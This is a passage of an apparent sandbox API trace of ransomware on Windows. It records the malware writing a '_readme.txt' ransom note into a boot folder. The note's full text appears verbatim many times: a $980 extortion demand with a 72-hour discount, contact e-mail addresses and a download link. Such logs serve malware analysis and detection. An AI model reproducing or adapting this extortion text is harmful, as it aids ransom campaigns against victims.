hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.920] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0142.920] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.920] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.920] PathFindFileNameW (pszPath="") returned="" [0142.920] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.921] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.921] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.921] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.921] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0142.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.921] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0142.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.921] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.921] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.922] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.922] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.922] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.923] CloseHandle (hObject=0x6f0) returned 1 [0142.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.924] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8ca3d50, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8ca3d50, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.924] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8ca3d50, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8ca3d50, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.924] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.924] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ca3d50, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8ca3d50, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8ca3d50, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.924] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ca3d50, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8ca3d50, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8ca3d50, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.924] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.924] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 